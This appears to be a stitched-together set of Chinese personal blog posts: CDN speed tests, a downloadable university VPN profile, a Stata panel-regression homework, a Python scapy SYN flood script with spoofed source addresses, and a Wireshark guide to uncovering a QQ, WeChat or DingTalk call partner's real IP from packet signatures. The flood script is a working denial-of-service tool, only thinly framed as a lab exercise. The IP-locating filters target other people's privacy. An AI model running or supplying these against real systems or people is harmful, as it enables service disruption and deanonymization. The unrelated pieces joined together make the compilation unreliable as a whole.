一、负载均衡情况

• 腾讯云CDN节点 负载主域名：https://caoyongzhuo.cn
  
  1. 178个探测点（完成178个）
  2. 最快四川成都[电信] 1ms
  3. 最慢美国 235ms
  4. 平均65.0ms

• 百度云CDN节点 负载子域名：https://www.caoyongzhuo.cn
  
  1. 178个探测点（完成178个）
  2. 最快四川成都[电信] 10ms
  3. 最慢韩国 596ms
  4. 平均47.5ms

二、网站链接速度对比

• 总体来说不尽如人意
• CDN节点覆盖偏向东南地区且相较集中
• 速度差异明显，网站实测负载效果差强人意吧

三、负载过程

先不写了，学不完了。以后更新！

一、免责申明

• 此文件仅供山东财经大学(学生用户)使用。
• 技术含量不高，所有大家不用担心自己的用户名和密码安全，全部都是本地化的。
• PBK文件为微软官方执行文件，未二次打包，防火墙要是报错请忽视。
• 不是网络信息中心官网VPN配置方式，要是有顾虑大可自己设置。
• 如有侵权请联系我删除，仅供学习参考，请勿用于非法获利。

二、下载地址

https://caoyongzhuo.cn/山财VPN/一键连接山财VPN.pbk

三、使用教程

1. 双击 一键连接山财VPN.pbk 程序

2. 点击 连接 按钮

3. 输入 账号 密码，点击连接

4. 显示连接中

5. 现在就可以上内网网站了
6. 如需挂断VPN，重新双击程序

7. 选择 挂断 即可

四、常见问题及其解决

1. 错误代码691

• 这个问题大概率是你的用户名密码输错了。
• 也可能是协议不正确导致的。
• 确保如下信息完全一致。

2. 错误代码628

• 学校服务器中止连接了
• 只需要重拨就行

五、代码原理

# 不要伪造Guid，否则后果自负！！
# 不要伪造Guid，否则后果自负！！
# 不要伪造Guid，否则后果自负！！
Encoding=1
PBVersion=6
Type=2
AutoLogon=0
UseRasCredentials=1
LowDateTime=580261312
HighDateTime=30957053
DialParamsUID=18500140
Guid=2E9E33939D329043A37D3C1631C02343
VpnStrategy=3
ExcludedProtocols=0
LcpExtensions=1
DataEncryption=8
SwCompression=0
NegotiateMultilinkAlways=0
SkipDoubleDialDialog=0
DialMode=0
OverridePref=15
RedialAttempts=3
RedialSeconds=60
IdleDisconnectSeconds=0
RedialOnLinkFailure=1
CallbackMode=0
CustomDialDll=
CustomDialFunc=
CustomRasDialDll=
ForceSecureCompartment=0
DisableIKENameEkuCheck=0
AuthenticateServer=0
ShareMsFilePrint=1
BindMsNetClient=1
SharedPhoneNumbers=0
GlobalDeviceSettings=0
PrerequisiteEntry=
PrerequisitePbk=
PreferredPort=VPN3-0
PreferredDevice=WAN Miniport (L2TP)
PreferredBps=0
PreferredHwFlow=1
PreferredProtocol=1
PreferredCompression=1
PreferredSpeaker=1
PreferredMdmProtocol=0
PreviewUserPw=1
PreviewDomain=1
PreviewPhoneNumber=0
ShowDialingProgress=1
ShowMonitorIconInTaskBar=1
CustomAuthKey=0
AuthRestrictions=544
IpPrioritizeRemote=1
IpInterfaceMetric=0
IpHeaderCompression=0
IpAddress=0.0.0.0
IpDnsAddress=0.0.0.0
IpDns2Address=0.0.0.0
IpWinsAddress=0.0.0.0
IpWins2Address=0.0.0.0
IpAssign=1
IpNameAssign=1
IpDnsFlags=0
IpNBTFlags=1
TcpWindowSize=0
UseFlags=2
IpSecFlags=1
IpDnsSuffix=
Ipv6Assign=1
Ipv6Address=::
Ipv6PrefixLength=0
Ipv6PrioritizeRemote=1
Ipv6InterfaceMetric=0
Ipv6NameAssign=1
Ipv6DnsAddress=::
Ipv6Dns2Address=::
Ipv6Prefix=0000000000000000
Ipv6InterfaceId=0000000000000000
DisableClassBasedDefaultRoute=0
DisableMobility=0
NetworkOutageTime=0
IDI=
IDR=
ImsConfig=0
IdiType=0
IdrType=0
ProvisionType=0
PreSharedKey=
CacheCredentials=1
NumCustomPolicy=0
NumEku=0
UseMachineRootCert=0
Disable_IKEv2_Fragmentation=0
PlumbIKEv2TSAsRoutes=0
NumServers=0
RouteVersion=1
NumRoutes=0
NumNrptRules=0
AutoTiggerCapable=0
NumAppIds=0
NumClassicAppIds=0
SecurityDescriptor=
ApnInfoProviderId=
ApnInfoUsername=
ApnInfoPassword=
ApnInfoAccessPoint=
ApnInfoAuthentication=1
ApnInfoCompression=0
DeviceComplianceEnabled=0
DeviceComplianceSsoEnabled=0
DeviceComplianceSsoEku=
DeviceComplianceSsoIssuer=
WebAuthEnabled=0
WebAuthClientId=
FlagsSet=0
Options=0
DisableDefaultDnsSuffixes=0
NumTrustedNetworks=0
NumDnsSearchSuffixes=0
PowershellCreatedProfile=0
ProxyFlags=0
ProxySettingsModified=0
ProvisioningAuthority=
AuthTypeOTP=0
GREKeyDefined=0
NumPerAppTrafficFilters=0
AlwaysOnCapable=0
DeviceTunnel=0
PrivateNetwork=0

NETCOMPONENTS=
ms_msclient=1
ms_server=1

MEDIA=rastapi
Port=VPN3-0
Device=WAN Miniport (L2TP)

DEVICE=vpn
PhoneNumber=ipsec.sdufe.edu.cn
AreaCode=
CountryCode=0
CountryID=0
UseDialingRules=0
Comment=
FriendlyName=
LastSelectedPhone=0
PromoteAlternates=0
TryNextAlternateOnFail=1

一、作业要求（数据文件homework.dta）

• 画出ln_wage和tenure的散点图以及拟合曲线。
• 以ln_wage为被解释变量，以age、race、msp、grade、south、union为解释变量，做描述性统计分析，给出变量之间的相关性水平，做普通最小二乘回归（报告估计系数、t统计值、F值、R2、观测值个数），以上结果以表格形式输出。
• 以ln_wage为被解释变量，以age、msp、south、union为解释变量，做个体固定效应回归（在idcode层面做聚类稳健标准误），以表格形式输出回归结果，报告组间R2。
• 以ln_wage为被解释变量，以age、msp、south、union为解释变量，做个体随机效应回归，以表格形式输出回归结果，报告组内R2。
• 利用hausman检验判断应该是个体固定效应回归还是个体随机效应回归，报告hausman统计值。
• 数据文件下载地址

二、代码文件如下（如有错误，请指正）

*切换路径*
clear
cd "F:\数学建模\计量经济学\homework" //数据文件所在目录
set more off
use homework.dta //使用homework.dta
*1.1绘制ln_wage和tenure散点图*
scatter ln_wage tenure
*1.2绘制ln_wage和tenure拟合优度*
twoway (lfit ln_wage tenure)
*补充：ln_wage和tenure散点图和拟合优度复合*
twoway (scatter ln_wage tenure ) (lfit ln_wage tenure)
*2.1.1给出一般描述性统计结果*
su ln_wage age race msp grade south union,de
*2.1.2给出详细描述性统计结果*
tabstat ln_wage age race msp grade south union, stat( mean sd p5 p25 med p75 p95 min max )
*2.2给出变量之间的相关性水平*
pwcorr   ln_wage age race msp grade south union,star(0.05)
*2.3普通最小二乘回归*
reg ln_wage age race msp grade south union
*2.4使用outreg2命令输出结果*
est store Result
//保留R²，F统计量，样本回归系数（保留三位小数），T统计量（保留两位小数）
outreg2 [Result] using Result.xsl, replace tstat e(r2,F) bdec(3) tdec(2)
*3.1告诉stata该数据为面板数据（工资ln_wage和年份year）*
xtset idcode year
*3.2个体固定效应回归（在idcode层面做聚类稳健标准误）*
xtreg ln_wage age msp south union ,fe vce(cluster idcode)
*3.3输出结果，汇报组间R² *
est store Xtreg_Fe
outreg2 [Xtreg_Fe] using Xtreg_Fe.xsl, replace tstat e(r2_b) 
*4.1个体随机效应回归（在idcode层面做聚类稳健标准误）*
xtreg ln_wage age msp south union i.year,re vce(cluster idcode)
*4.2输出结果，汇报组内R² *
est store Xtreg_Re
outreg2 [Xtreg_Re] using Xtreg_Re.xsl, replace tstat e(r2_w) 
*利用hausman检验判断应该是个体固定效应回归还是个体随机效应回归*
//个体固定回归（不做聚类稳健标准误）
xtreg ln_wage age msp south union ,fe 
est store Xtreg_Fe_1
//个体随机回归（不做聚类稳健标准误）
xtreg ln_wage age msp south union i.year,re
est store Xtreg_Re_1
//计算hausman
hausman Xtreg_Fe_1 Xtreg_Re_1,constant sigmamore

三、数据结果的图文说明

切换路径*
clear
cd "F:\数学建模\计量经济学\homework" //数据文件所在目录
set more off
use homework.dta  //使用homework.dta 

1. 画出ln_wage和tenure的散点图以及拟合曲线。

1.1绘制ln_wage和tenure散点图*
scatter ln_wage tenure

1.2绘制ln_wage和tenure拟合优度*
twoway (lfit ln_wage tenure)

补充：ln_wage和tenure散点图和拟合优度复合*
twoway (scatter ln_wage tenure) (lfit ln_wage tenure)

2. 以ln_wage为被解释变量，以age、race、msp、grade、south、union为解释变量，做描述性统计分析，给出变量之间的相关性水平，做普通最小二乘回归(报告估计系数、t统计值、F值、R2、观测值个数），以上结果以表格形式输出。

2.1.1给出一般描述性统计结果*
su ln_wage **age race msp grade south union,**de
*2.1.2给出详细描述性统计结果*
tabstat ln_wage **age race msp grade south union,** stat**(** mean sd p5 p25 med p75 p95 min max **)

2.2给出变量之间的相关性水平*
pwcorr  ln_wage **age race msp grade south union,**star**(0.05)

2.3普通最小二乘回归*
reg ln_wage **age race msp grade south union**
*2.4使用outreg2命令输出结果*
est store **Result**
//保留R²，F统计量，样本回归系数（保留三位小数），T统计量（保留两位小数）
outreg2 **[Result] using** Result.xsl**, replace** tstat **e(r2,F) bdec(3) tdec(2)

回归结果如下：

结果报告：**
​                    **age   race  msp   grade  south  union  Constant**
**估计系数：[0.009]  [-0.051] [-0.016] [0.078] [-0.124]  [0.182]  [0.552]**
**T统计量：(-19.65)  （-8.03） (-2.60)  (-62.33) (-20.02) (-26.05) (-23.75)**
​    **F值：1145**                  **R2：0.263**                 **Obs：19213

3. 以ln_wage为被解释变量，以age、msp、south、union为解释变量，做个体固定效应回归（在idcode层面做聚类稳健标准误），以表格形式输出回归结果，报告组间R2。

*3.1告诉stata该数据为面板数据（工资ln_wage和年份year）*
xtset idcode year
*3.2个体固定效应回归（在idcode层面做聚类稳健标准误）*
xtreg ln_wage age msp south union ,fe vce(cluster idcode)

*3.3输出结果，汇报组间R² *
est store Xtreg_Fe
outreg2 [Xtreg_Fe] using Xtreg_Fe.xsl, replace tstat e(r2_b)

结果如下：

结果报告：组间R2的值为 0.0711

4. 以ln_wage为被解释变量，以age、msp、south、union为解释变量，做个体随机效应回归，以表格形式输出回归结果，报告组内R2。

***4.1****个体随机效应回归（在****idcode****层面做聚类稳健标准误）*******
xtreg ln_wage age msp south union i.year**,**re **vce(**cluster **idcode)

***4.2****输出结果，汇报组内****R² \***
est **store** Xtreg_Re
outreg2 **[**Xtreg_Re**] using** Xtreg_Re.xsl**,** replace **tstat e(r2_w)

结果如下：

结果报告：组内R2的值为 0.101

5. 利用hausman检验判断应该是个体固定效应回归还是个体随机效应回归，报告hausman统计值

*****利用****hausman****检验判断应该是个体固定效应回归还是个体随机效应回归*******
**//****个体固定回归（不做聚类稳健标准误）**
xtreg **ln_wage age msp south union ,**fe 
est **store Xtreg_Fe_1

//****个体随机回归（不做聚类稳健标准误）**
xtreg ln_wage age msp south union **i.year,**re
est **store** Xtreg_Re_1

//****计算****hausman**
hausman Xtreg_Fe_1 Xtreg_Re_1**,constant** sigmamore

hausman结果报告： chi2值为107.18 ，同时 P统计量 = 0.000 < 0.05结果显著。**
​                  **拒绝原假设（H0:** **个体随机效应回归），采用（个体固定效应回归）

++++++++++++++++++++++++++ 计量经济学 Copyright By © 学金融的文科生 ++++++++++++++++++++++++++

编写python脚本实现SYN FLOOD（DDOS）

原理

SYN FLOOD是DDOS的一种，发生在OSI第四层，这种方式利用TCP协议的特性，就是三次握手。攻击者发送TCP SYN，SYN是TCP三次握手中的第一个数据包，当服务器返回ACK后，该攻击者就不对其进行再确认，那这个TCP连接就处于挂起状态，也就是所谓的半连接状态，服务器收不到再确认的话，还会重复发送ACK给攻击者。

攻击者就对服务器发送非常大量的这种TCP连接，由于每一个都没法完成三次握手，所以在服务器上，这些TCP连接会因为挂起状态而消耗CPU和内存，最后服务器可能死机，从而就无法为正常用户提供服务了。

实验方式

在本机运行脚本，攻击kali linux靶机的80端口，模拟攻击靶机网站，然后在kali linux里使用wireshark观察接收数据分析信息验证是否成功。

Python脚本

import random
import time
from scapy.all import *
#这里的tgt是被攻击的靶机的IP地址
tgt="192.168.137.128"
print(tgt)
dPort = 80
def synFlood(tgt,dPort):
    srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
    for sPort in range(1024,65535):
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort,flags="S")
        packet = ipLayer / tcpLayer
        send(packet)
synFlood(tgt,dPort)

kali linux靶机开启apache，并且绑定0.0.0.0:80端口

查看服务开启状态

service --stauts-all

这里apache没有开启，我们将其开启

service apache2 start

小插曲：主机访问不了kali linux虚拟机的解决方案

这中间遇到了个小插曲，我的主机访问不了虚拟机，这里需要进行网卡还原操作。

需要管理员权限，编辑ports.conf文件

sudo vim /etc/apache2/ports.conf

编辑文件将80端口改成0.0.0.0:80

在kali打开wireshark

windows里运行python脚本

kali里面是自带的scapy，这里windows电脑要提前装好scapy

pip3 install scapy-python3

如果中间提示

Traceback (most recent call last):
  File "D:\PycharmProjects\new\main.py", line 3, in
    from scapy.all import *
ModuleNotFoundError: No module named 'scapy'

如下图所示

我们需要将scapy的包拷到项目的目录里就好了

然后就可以运行了，可以看到已经在疯狂发包了。

kali这边已经可以看到很多发送请求，这里通过SNY FLOOD可以占用虚拟机很大的资源，但是这里因为是内网所以带宽方面表现不明显，如果是外网的话，通过SNY断开连接占用大量带宽资源，应该会有明显的卡顿。

一、相关声明

本教程仅用于hvv、红蓝攻防对抗等专业领域，请勿用于非法用途。

二、下载地址

城通网盘：https://url95.ctfile.com/d/22064395-39422032-21b658（访问密码：YPOJIE）

天翼云盘：https://cloud.189.cn/t/IjEruyiMjAry (访问码:p4ff)

蓝奏云盘：https://ypj.lanzout.com/b00nnkori 密码: biu1

百度网盘：https://pan.baidu.com/s/14PkxeIgUVJVqoh-Do4mMtg 提取码: byia

三、图文教程

首先，我们打开wireshark，这里我们要注意的是

• 如果你是使用的有线连接的互联网，则使用以太网
• 如果你是使用的WIFI连接的互联网，则使用Wlan

我们这里属于第二种情况，所以选择WLAN

方法一：使用CTRL+F字符串查找

按一下ctrl F，选择分组详情、字符串、然后输入代码020048（这个是QQ语音对应的特征）

然后使用电脑QQ给对方的号码拨打语音电话，等待对方接通以后，我们点查找就可以看到对方的IP地址了。

方法二：在过滤器中填写代码回车查找

在过滤器中填写udp[8:3]==02:00:48进行过滤，比第一种方法更加直观

为什么是020048？

那这里肯定会有人问了为什么是020048，QQ语音通话使用的是UDP协议直连，简单来说就是语音通话的双方直接连接，不通过其他服务器，020048是QQ UDP协议72字节的报文头

同时也是为什么可以使用udp[8:3]==02:00:48进行过滤的原因，UDP前面包括8字节UDP头，后面就是数据，但是wireshark并没有提供udp.data这种直接的过滤方式，故我们使用偏移来实现此过滤，也就只能靠udp[8:x]这样偏移来获取（注：8是固定的八个字节），QQ前面的报文头是不会变化的，所以说我们可以通过之前说的两种方式来找到包含带有真实IP的包。

微信语音获取IP特征过程

如果我们不知道特征，那么怎么去尝试寻找特征呢？其实很简单，电脑连上WIFI，给另一个微信（已知IP）打个电话，然后开着wireshark，在过滤器上可以输入我们已知的IP地址（如果你不知道自己的IP地址，可以在百度上直接输入本机ip就可以快速获取了，我们这里已经获取好了，在过滤器中输入）

然后，我们展开详情，看看Data里有没有同样的特征

我们在这里发现，微信与QQ不同，他的报文头是随机的值，通过找规律发现前两位都是a3，根据之前说的原理，可以使用udp[8:1]==a3进行过滤。

利用data.len进行过滤

这个抓包的并没有上面的第一种方法准确（并不缺少数据，但是过滤后的无关IP较多），此方法参考了台湾中央警察大学三位研究员2020年9月在公开会议上分享的一篇论文，其中提到了根据Length、Time to live、Flags三个维度来来判断嫌疑人真实IP的技巧，根据这篇论文提供的思路，最后得出的命令为data.len >= 120 and data.len <= 150，也就是筛选Length长度为120到150区间的包

其他客户端的特征有吗？

微信、钉钉这些语音的特征有吗？

答案是有的，我们这里直接分享其特征：

• 钉钉：udp[8:4]==00:01:00:4c
• QQ：udp[8:3]==02:00:48
• 微信：udp[8:1]==a3

参考原文

• 《天禧信安：通过语音获取真实IP浅析》https://mp.weixin.qq.com/s/x3OIOehjqNAqz4Jlp8v18g
• 《Forensic Artifacts of Network Traffic on WeChat Calls》https://ieeexplore.ieee.org/document/9061437